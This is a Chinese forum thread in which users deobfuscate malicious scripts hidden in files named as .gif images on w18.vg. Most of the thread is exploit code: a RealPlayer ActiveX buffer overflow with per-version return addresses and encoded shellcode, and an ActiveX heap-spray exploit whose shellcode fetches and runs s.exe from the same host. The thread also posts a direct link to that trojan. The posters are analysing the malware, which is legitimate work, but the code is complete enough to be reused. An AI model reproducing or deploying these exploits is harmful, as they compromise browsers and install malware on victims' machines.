高手来解

tanlimo

[frame]http://w18.vg/xl.gif
[frame]http://w18.vg/real.gif
[frame]http://w18.vg/bf.gif
[frame]http://w18.vg/lz.gif
[frame]http://w18.vg/ms.gif
[frame]http://w18.vg/baidu.gif

samsinn

1. SCRIPT language=javascript>dI75=7448;if(document.all){function _dm(){return false};function _mdm(){document.oncontextmenu=_dm;setTimeout("_mdm()",800)};_mdm();}document.oncontextmenu=new Function("return false");function _ndm(e){if(document.layers||window.sidebar){if(e.which!=1)return false;}};if(document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=_ndm;}else{document.onmouseup=_ndm;};lQ26=2022;bO91=6023;function _dws(){window.status = " ";setTimeout("_dws()",100);};_dws();iE5=5450;oH78=6020;function _dds(){if(document.all){document.onselectstart=function (){return false};setTimeout("_dds()",700)}};_dds();nU38=7163;tC8=4022;function _nr(){return true}onerror=_nr;sP68=5165;eV15=6305;eA12=2595;qG59=3734;yO10=8309;vW92=5447;vC89=1737;;_licensed_to_="huyufeng";
   
2. 
   
3. fasdfasfdddddddddddd = "fldsjafldsajf&&&&&&&&&&&&&&&";
   
4. function RealExploit()
   
5. {
   
6. 
   
7. VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
   
8. try
   
9. {
   
10. Real = new ActiveXObject(VulObject);
    
11. }catch(error)
    
12. {
    
13. return;
    
14. }
    
15. 
    
16. RealVersion = Real.PlayerProperty("PRODUCTVERSION");
    
17. Padding = "";
    
18. JmpOver = unescape("%75%06%74%04");
    
19. for(i=0;i<32*148;i++)
    
20. Padding += "S";
    
21. if(RealVersion.indexOf("6.0.14.") == -1)
    
22. {
    
23. if(navigator.userLanguage.toLowerCase() == "zh-cn")
    
24. ret = unescape("%7f%a5%60");
    
25. else if(navigator.userLanguage.toLowerCase() == "en-us")
    
26. ret = unescape("%4f%71%a4%60");
    
27. else
    
28. return;
    
29. }
    
30. else if(RealVersion == "6.0.14.544")
    
31. ret = unescape("%63%11%08%60");
    
32. else if(RealVersion == "6.0.14.550")
    
33. ret = unescape("%63%11%04%60");
    
34. else if(RealVersion == "6.0.14.552")
    
35. ret = unescape("%79%31%01%60");
    
36. else if(RealVersion == "6.0.14.543")
    
37. ret = unescape("%79%31%09%60");
    
38. else if(RealVersion == "6.0.14.536")
    
39. ret = unescape("%51%11%70%63");
    
40. else
    
41. return;
    
42. if(RealVersion.indexOf("6.0.10.") != -1)
    
43. {
    
44. for(i=0;i<4;i++)
    
45. Padding = Padding + JmpOver;
    
46. Padding = Padding + ret;
    
47. }
    
48. else if(RealVersion.indexOf("6.0.11.") != -1)
    
49. {
    
50. for(i=0;i<6;i++)
    
51. Padding = Padding + JmpOver;
    
52. Padding = Padding + ret;
    
53. }
    
54. else if(RealVersion.indexOf("6.0.12.") != -1)
    
55. {
    
56. for(i=0;i<9;i++)
    
57. Padding = Padding + JmpOver;
    
58. Padding = Padding + ret;
    
59. }
    
60. else if(RealVersion.indexOf("6.0.14.") != -1)
    
61. {
    
62. for(i=0;i<10;i++)
    
63. Padding = Padding + JmpOver;
    
64. Padding = Padding + ret;
    
65. }
    
66. AdjESP = "LLLL\\XXXXXLD";
    
67. Shell ="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0p47zpfKRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGONuKpTRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMWQuMwrunOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCXHmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoRWTqvXTnPv3W6OSC6NPepxpeop7p";
    
68. PayLoad = Padding + AdjESP + Shell;
    
69. while(PayLoad.length < 0x8000)
    
70. PayLoad += "ChuiZi";
    
71. Real["\x49\x6d\x70\x6f\x72\x74"]("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
    
72. }
    
73. RealExploit();
    

复制代码

samsinn

http://w18.vg/s.exe

tanlimo

1. 
   
2. 
   
3. 这段代码貌似会让IE死，去掉吧

复制代码

晕.......

[ 本帖最后由 tanlimo 于 2008-2-12 23:31 编辑 ]

深红的雪

document.write改alert
或者赋值给一个文本框输出

solcroft

你的是哪个？
我来解xl.gif，shellcode懒得动手，由别人来了

lJ77=5364;if(document.all){function _dm(){return false};function _mdm(){document.oncontextmenu=_dm;setTimeout("_mdm()",800)};_mdm();}document.oncontextmenu=new Function("return false");function _ndm(e){if(document.layers||window.sidebar){if(e.which!=1)return false;}};if(document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=_ndm;}else{document.onmouseup=_ndm;};uQ28=9939;jO93=3940;function _dws(){window.status = " ";setTimeout("_dws()",100);};_dws();qE7=3367;wH81=3937;function _dds(){if(document.all){document.onselectstart=function (){return false};setTimeout("_dds()",700)}};_dds();vU40=5080;bC11=1939;function _nr(){return true}onerror=_nr;aP70=3082;mV17=4222;mB14=511;yH61=1651;hO12=6225;dX94=3364;eC91=9654;;_licensed_to_="huyufeng";</script><script type="text/jscript">function init() { document.write("");}window.onload = init;
var expires = new Date();
bbbbbbbbbbbbbbiooioio = "yyyyyyyyiiiii&&&&*^&^&^*&^*&^*&^*&";
expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
var set_cookie = document.cookie.indexOf("3Ware=");
if (set_cookie == -1){document.cookie = "3Ware=1;expires=" + expires.toGMTString();
document.write('<object id="gl" classid="clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F"></object>');
var helloworld2Address = 0x0c0c0c0c;
var shellcode = unescape("%u4343"+"%u4343"+"%u4343" +
"%ua3e9"+"%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0868%uf78b%u046a%ue859%u0043%u0000" +
"%uf9e2%u6f68"+"%u006e%u6800"+"%u7275%u6d6c"+"%uff54%u9516" +
""+"%u2ee8%u0000%u8300%u20ec%udc8b%u206a%uff53%u0456" +
"%u04c7%u5c03%u2e61"+"%uc765%u0344%u7804%u0065%u3300" +
"%u50c0%u5350%u5057%u56ff%u8b10%u50dc%uff53%u0856" +
""+"%u56ff"+"%u510c%u8b56%u3c75"+"%u748b%u782e%uf503%u8b56" +
"%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb"+"%u10be" +
"%ud63a%u0874"+"%ucbc1%u030d%u40da"+"%uf1eb%u1f3b%ue775" +
"%u8b5e"+"%u245e%udd03%u8b66%u4b0c"+"%u5e8b%u031c%u8bdd" +
"%u8b04%uc503"+"%u5eab%uc359%u58e8"+"%uffff%u8eff%u0e4e" +
"%uc1ec"+"%ue579%u98b8"+"%u8afe%uef0e"+"%ue0ce%u3660%u2f1a" +
"%u6870%u7474"+"%u3a70%u2f2f"+"%u3177%u2e38"+"%u6776%u732f" +
"%u652e"+"%u6578"+"%u0000");
bbbbbbbbbbbbbbiooioio = "yyyyyyyyiiiii&&&&*^&^&^*&^*&^*&^*&";
var hbshelloworld = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = hbshelloworld - (payLoadSize+0x38);
var spraySlide = unescape("%u0D0D%u0D0D");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
      memory = spraySlide + shellcode;
}

function getSpraySlide(spraySlide, spraySlideSize)
{
        while (spraySlide.length*2<spraySlideSize)
        {
                  spraySlide += spraySlide;
        }
        spraySlide = spraySlide.substring(0,spraySlideSize/2);
        return spraySlide;
}
var size_buff = 1070;
var x =  unescape("%0c%0c%0c%0c");
while (x.length<size_buff) x += x;
fasdfasdf = "flksajdfkasjflksaf";
gl["\x46\x6c\x76\x50\x6c\x61\x79\x65\x72\x55\x72\x6c"] = x;
}
</SCRIPT>
<script>
if (set_cookie == -1){
location.reload();
}

solcroft

... 好像全部都是同样一个木马

tanlimo

改alert执行后不能复制啊

solcroft

zzh161

那就扔给文本框。。。之前阿米就提供过一个解密的教程了，里面就说了这种加密了